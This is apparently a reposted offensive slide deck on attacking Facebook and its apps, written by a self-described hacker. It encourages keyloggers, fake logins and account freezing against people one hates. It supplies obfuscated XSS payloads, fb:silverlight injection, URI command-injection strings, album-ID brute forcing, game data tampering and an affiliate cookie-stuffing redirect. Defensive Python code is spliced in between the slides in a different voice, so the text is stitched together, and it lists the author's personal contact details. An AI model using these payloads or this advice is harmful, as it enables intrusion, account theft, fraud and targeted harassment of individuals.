FaceBook (in)Security - Majalah Info Komputer Online
Shared by: AyechKiki
Posted: 1/31/2013
FaceBook (in)Security
Anselmus Ricky
Introduction
Hi, my name is Anselmus Ricky, and I am an asshole.
I hack stuff for my own benefit, manipulate girls’ feelings like it means nothing, get
excessively drunk at inappropriate times, ignore the consequences of my actions, mock
those idiots and posers, and just generally enjoy exploiting other people’s
psychological insecurities.
But I do contribute to humanity in one very important way: I share my knowledge and
stories with the world.
FaceBook (in)Security – an Overview
• Attacking via Functionality
• Attacking via Offsite Contents
• Attacking with IMG Tag / Scripts
• Attacking with Simple URL Forgery
• Attacking the Applications
• Attacking via Applications
• Social Engineering and Information Usages*
Attacking FaceBook Functionality
Email Hacking
“Won’t it be hard?”
“No! You still have no information regarding her postal code! How can you hack her then?”
Suggestion: “just don’t do it over Mr. Susilo Bambang Yudhoyono.”
Attacking FaceBook via Offsite Contents
• If you want to spy on someone:
– Use keyloggers and/or trojans (please don’t confuse it with the condom)
• If you hate someone:
– Feel free to take over their account using a fake login
• If you hate a lot of ‘someones’:
– Stimulate your fake login with Cross Site Scripting
• If you do not know how to hack FaceBook:
– Feel free to ‘curse’ the person you hate
– Feel free to post bad comments on his/her wall
– Feel free to use Account Freezer Software
http://www.indowebster.com/Facebook_Account_Freezer_v1.html
Multi-line Strings
In PHP we have a multi-line string creation tool called heredoc, which helps the
programmer simplify:
$my_string = "Tizag - Unlock your potential!";
echo "Tizag - Unlock your potential!";
echo $my_string;
Which is displayed as:
Tizag - Unlock your potential! Tizag - Unlock your potential!
into something like:
$my_string = <<<TEST
Tizag.com
Webmaster Tutorials
Unlock your potential!
TEST;
echo $my_string;
Which is still displayed on a single line, because the browser collapses the newlines
inside the string into ordinary whitespace:
Tizag.com Webmaster Tutorials Unlock your potential!
Attacking FaceBook with Script Injections
• XML is more complicated than JavaScript
• XML supports multi-line string creation
• XML is rarely used to mount an attack
• XML is not completely filtered by FaceBook
• The JS parser in FireFox supports E4X, but the JS sandbox technology doesn’t
even know about it
So instead of just executing this JavaScript:
<script>alert('Th0R Was Here!');</script>
people just execute this:
<script>
<a b=" c" {alert('Th0R Was Here!')}="d" />
</script>
NB: the variables a, b, c, and d are just junk variables used to conceal the alert string; you
can change them into anything you like, but do not break the script’s conditions (such as by
replacing characters, etc.).
And many more:
• "a"["__parent__"].eval("alert('any javascript here');");
• /a/["__parent__"].eval("alert('any javascript here');");
• 1.["__parent__"].eval("alert('any javascript here');");
URI – an Overview
• Generic URIs
– http://, ftp://, telnet:, etc.
• What other URIs are registered on the Net?
– aim://, feed://, firefoxurl://, picasa://, etc.
Attacking FaceBook with URI Abuse
• URIs are often linked directly to applications
• Applications are vulnerable
• Which means XSS (Cross Site Scripting) is up!
• The aim:// handler actually calls the command:
'Rundll32.exe "C:\Program Files\Trillian\plugins\aim.dll",aim_util_urlHandler url="%1" ini="c:\program files\trillian\users\default\cache\pending_aim.ini"'
• This means an attacker can modify the value handed to aim_util_urlHandler
through the URI itself. Example: aim://OwnURL.
• The value is copied without being checked (or filtered), which drives the
application into a stack overflow.
Example:
• Aim:///#1111111/
• What if you wanted to contact Mr. Joan Joman as a girl?
– ymsgr:sendim?joker_salapant&m=I+think+we+should+go+for+a+date…+meet+you+there
– gtalk:chat?jid=joker_salapant@gmail.com
– gtalk:call?jid=joker_salapant@gmail.com
– aim:goim?screenname=joker_salapant&m=I+love+you+NOT
– skype:joan_salapant?call
• Prank! True, it can generate quite some excitement.
• What if you create an XSS that loops to send as many messages as possible to a
single YM account, and put it on your website, which is visited by 600 people daily?
• Cross-provider DDoS on people!
There are also simpler URIs that can cause command injection:
• mailto:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe "-" blah.bat
• nntp:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe "-" blah.bat
• news:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe "-" blah.bat
• snews:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe "-" blah.bat
• telnet:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe "-" blah.bat
• Etc.
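The common thread in the handler URIs above is that a link posted by a user is handed by the browser straight to a local application. As an added example (my own, not from these slides or from FaceBook), here is the kind of check a site can apply to user-supplied URLs before rendering them as links: only absolute http(s) URLs pass, every other scheme is refused, and the %00 and control-character tricks are rejected before parsing. The function names and the length limit are assumptions.

```python
from urllib.parse import urlsplit

# Schemes a site should render as clickable links. Handler schemes such as
# aim:, ymsgr:, gtalk:, skype:, mailto:, news:, nntp: and telnet: are passed
# by the browser to a local program, so they are deliberately not listed.
ALLOWED_SCHEMES = {"http", "https"}
MAX_LEN = 2048  # assumed limit; very long inputs are a classic overflow vector

def is_safe_link(raw: str) -> bool:
    """True only for an absolute http(s) URL with a host and no credentials."""
    if not isinstance(raw, str) or not raw or len(raw) > MAX_LEN:
        return False
    # Literal or percent-encoded NUL and other control characters are what
    # the mailto:/nntp:/telnet: payloads use to cut a handler's command
    # line short; reject them before any parsing happens.
    if "%00" in raw.lower() or any(ord(c) < 0x20 or c == "\x7f" for c in raw):
        return False
    raw = raw.strip()
    try:
        parts = urlsplit(raw)
    except ValueError:        # e.g. a malformed IPv6 literal
        return False
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False          # aim:, ymsgr:, javascript:, data:, ... all fail here
    if not parts.hostname:
        return False          # "http://" alone or a scheme-only string
    if parts.username is not None or parts.password is not None:
        return False          # refuse user:pass@host forms
    return True

def render_link(raw: str, fallback: str = "#") -> str:
    """The href to emit: the checked URL, or a harmless fallback."""
    return raw.strip() if is_safe_link(raw) else fallback
```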
Several unique and new URIs can be used to bypass JS filtering on FaceBook:
<fb:silverlight silverlightsrc="http://www.somesite.com/silverlight" />
Forged into:
<fb:silverlight silverlightsrc="a" mce_src="a" width="\" height=",<script>alert('Th0R')</script>);//" />
NB: Microsoft Silverlight is a web application framework that provides functionalities similar to those
in Adobe Flash, integrating multimedia, graphics, animations and interactivity into a single runtime
environment.
http://wiki.developers.facebook.com/index.php/Fb:silverlight
Attacking FaceBook with URL Forgery
URL Forgery – anyone?
The new way – the brute-force attack – the one that works:
• This is the URL of your friend’s album:
– http://facebook.com/album.php?aid=161512&id=987654321
• The id= variable is their profile’s unique number:
– id=987654321
• This can easily be found through friend search
– you can either search, right-click and view properties, etc.
• On the other hand, the aid= variable is the album’s unique number:
– aid=161512
• This is impossible to search for – therefore, we brute-force it.
– http://www.owasp.org/index.php/Category:OWASP_Webslayer_Project
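The aid= brute force pays off only when the server treats a correctly guessed album number as permission to view it. As an added example (not part of these slides or of FaceBook’s code), here is an album authorization check that is decided by the album’s own audience setting, followed by detection logic that flags a viewer collecting 403s on consecutive aids, the pattern a Webslayer run leaves in the access log. The record layout, the log line format and all ids are constructed.

```python
import re
from collections import defaultdict
# Constructed sample records: album id -> owner profile id and audience.
ALBUMS = {
    161512: {"owner": 987654321, "visibility": "friends"},
    161513: {"owner": 987654321, "visibility": "only_me"},
    200001: {"owner": 555000111, "visibility": "everyone"},
}
FRIENDS = {987654321: {111222333}, 555000111: set()}  # owner -> friend ids

def can_view_album(viewer: int, aid: int) -> bool:
    """The album's audience setting decides; a correctly guessed aid is not enough."""
    album = ALBUMS.get(aid)
    if album is None:
        return False  # unknown and forbidden albums get the same answer
    if viewer == album["owner"] or album["visibility"] == "everyone":
        return True
    if album["visibility"] == "friends":
        return viewer in FRIENDS.get(album["owner"], set())
    return False
LOG_RE = re.compile(r"viewer=(\d+) aid=(\d+) status=(\d+)")  # constructed log format
def find_album_enumeration(log_lines, threshold: int = 5) -> dict:
    """Return {viewer: longest run of consecutive aids denied with 403}, over threshold."""
    # A Webslayer-style brute force walks aid values in order, so its denials
    # land on adjacent numbers; someone browsing albums does not do that.
    denied = defaultdict(set)
    for line in log_lines:
        m = LOG_RE.search(line)
        if m and m.group(3) == "403":
            denied[int(m.group(1))].add(int(m.group(2)))
    flagged = {}
    for viewer, aids in denied.items():
        ordered = sorted(aids)
        run = best = 1
        for prev, cur in zip(ordered, ordered[1:]):
            run = run + 1 if cur == prev + 1 else 1
            best = max(best, run)
        if best >= threshold:
            flagged[viewer] = best
    return flagged

# Constructed log: one viewer walks aid 161500..161511, a friend views normally.
SAMPLE_LOG = [
    f"GET /album.php?aid={a}&id=987654321 viewer=444555666 aid={a} status=403"
    for a in range(161500, 161512)
] + [
    "GET /album.php?aid=161512&id=987654321 viewer=111222333 aid=161512 status=200",
    "GET /album.php?aid=161513&id=987654321 viewer=111222333 aid=161513 status=403",
]
```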
Attacking FaceBook Applications
I hate Zynga. They’ve been in the business for only (less than) 2 years, and now show
tremendous growth in their financial records and total company revenues – they earned
US$100 million in profit for the year 2009 and counting.
• They implemented Mafia Wars, FarmVille, and Café World.
• All of them are known worldwide and have become very popular.
• FarmVille alone has 60 million people playing it daily.
• Mafia Wars follows right behind in 2nd place.
• Café World is on its way to the top with tremendous growth.
• Zynga is the biggest financial contributor to FaceBook.
So I want to hack FarmVille!
The easiest way is to play around with the ‘stuck character’.
• I simply go to the market and buy some cheap decorations.
• I put my farmer character in the corner of my farm and lock him in with the
decorations I bought.
• I start doing my farming without wasting any time waiting for my character to
move from plot to plot to plow, water and do a lot of other stuff.
But I want in-game money! Then I will just play around with their “flash timer”.
• Approve what my neighbors asked me to do.
• However, I don’t move my mouse cursor from that point; I keep clicking to visit
the same neighbor over and over again.
• After doing that clicking 20 times, I just click approve on all the offers given
(there will be 20 in total), which means I get 20x more money and 20x more
experience than normal.
The harder way is to tamper with the data of each game. Since I’m bored with
Zynga, I will do it with other game developers.
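Both FarmVille tricks above, replaying the neighbor visit 20 times and tampering with the request data, work only because the game trusts what the client sends. As an added example (my own, not Zynga’s code), here is a server-side reward handler in which an offer token is issued once per neighbor per server-side day and paid exactly once, while any amount the client supplies is ignored. The reward values, the Player layout and the day string are assumptions.

```python
import secrets
from dataclasses import dataclass, field
from typing import Optional

REWARD_COINS, REWARD_XP = 100, 10   # constructed values; fixed by the server

@dataclass
class Player:
    uid: int
    coins: int = 0
    xp: int = 0
    open_offers: dict = field(default_factory=dict)  # token -> (neighbor, day)
    paid: set = field(default_factory=set)           # (neighbor, day) rewarded

def offer_visit(player: Player, neighbor: int, day: str) -> Optional[str]:
    """Issue a one-time offer token for visiting `neighbor` on `day`.

    Clicking the visit 20 times does not create 20 offers: offers are keyed
    by (neighbor, day) on the server, so one stays open until it is paid.
    """
    key = (neighbor, day)
    if neighbor == player.uid or key in player.paid or key in player.open_offers.values():
        return None
    token = secrets.token_hex(8)
    player.open_offers[token] = key
    return token

def approve_offer(player: Player, token: str, client_amount: int = 0) -> bool:
    """Pay the reward for `token` exactly once.

    `client_amount` stands for whatever the client puts in the request body;
    a tampered value changes nothing because the server uses its own figures.
    """
    key = player.open_offers.pop(token, None)
    if key is None or key in player.paid:
        return False
    player.paid.add(key)
    player.coins += REWARD_COINS
    player.xp += REWARD_XP
    return True
```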
Do not forget to download Tamper Data via this link:
https://addons.mozilla.org/en-US/firefox/addon/966
Attacking via FaceBook Applications
When you’re running out of ideas to hack FaceBook’s main applications, just use
their side applications to hack the person you hate.
• Create your own group for Social Engineering methods
• Create your own application with malicious content inside
• Create or find a loophole in others’ applications (usually games)
• Check the Friends for Sale (FFS) application
• What if I change the HTML code from:
– <img src='http://i877.photobucket.com/albums/ab333/steffi1306/spongebob.jpg'></img>
• into something like:
– <img src='http://www.th0r.info/images/amazon.jpg'></img>
• where amazon.jpg is a redirect to:
– http://www.amazon.com/?Fencoding=UTF8&tag=qufrho-20
Meaning . . .
• People who open that page will see my picture
• The picture will be shown as a broken image
• While I have actually redirected them all to amazon.com
• Within the amazon.com link I embedded my personal affiliate ID
• People get their browser cookies stuffed
• Whoever goes to amazon.com and buys something will have their purchase
commission come into my very own wallet
• What do you think of cookie stuffing (for fun and profit) residing on FaceBook –
the social networking website with 400 million users accessing it every single day?
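The picture trick works because each visitor’s own browser follows the redirect and receives the affiliate cookie. As an added example (my own, not from these slides or from FaceBook), here is the decision logic of a server-side image proxy that fetches the <img src> itself and refuses a redirect that leaves the original host or a final response that is not an image, so the visitor’s browser never reaches the redirect target. The HTTP client is a constructed table of responses keyed by the URLs from the slide, and the response contents are assumed.

```python
from urllib.parse import urlsplit

# Constructed stand-in for an HTTP client: url -> (status, headers). The URLs
# are the ones from the slide; the responses are assumed.
FAKE_HTTP = {
    "http://i877.photobucket.com/albums/ab333/steffi1306/spongebob.jpg":
        (200, {"Content-Type": "image/jpeg"}),
    "http://www.th0r.info/images/amazon.jpg":
        (302, {"Location": "http://www.amazon.com/?Fencoding=UTF8&tag=qufrho-20"}),
    "http://www.amazon.com/?Fencoding=UTF8&tag=qufrho-20":
        (200, {"Content-Type": "text/html", "Set-Cookie": "aff=qufrho-20"}),
    "http://www.th0r.info/images/real.jpg":
        (301, {"Location": "http://www.th0r.info/cdn/real.jpg"}),
    "http://www.th0r.info/cdn/real.jpg": (200, {"Content-Type": "image/jpeg"}),
}
REDIRECTS = {301, 302, 303, 307, 308}

def fetch(url):
    return FAKE_HTTP.get(url, (404, {}))

def resolve_image(src: str, max_hops: int = 3):
    """Return (ok, detail) for an <img src> the proxy is asked to serve.

    The proxy follows redirects itself, so the visitor's browser never talks
    to the redirect target and cannot be handed its cookies. A redirect that
    leaves the original host, or a final response that is not an image, is
    refused and a placeholder image is served instead.
    """
    origin = urlsplit(src).hostname
    if origin is None:
        return False, "no host"
    url = src
    for _ in range(max_hops + 1):
        status, headers = fetch(url)
        if status in REDIRECTS:
            target = headers.get("Location", "")
            if urlsplit(target).hostname != origin:
                return False, f"cross-host redirect to {urlsplit(target).hostname}"
            url = target
            continue
        if status != 200:
            return False, f"status {status}"
        ctype = headers.get("Content-Type", "").split(";")[0].strip().lower()
        if not ctype.startswith("image/"):
            return False, f"not an image: {ctype or 'unknown'}"
        return True, url
    return False, "too many redirects"
```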
Thank You
Anselmus Ricky
http://www.th0r.info
Mobile: (+62) 813-8017-5867 and (+1) 206-458-5992
MSN: binus_2_0_0_4@hotmail.com
YM: hackingforte (@yahoo.it)
BlackBerry PIN: 209256E2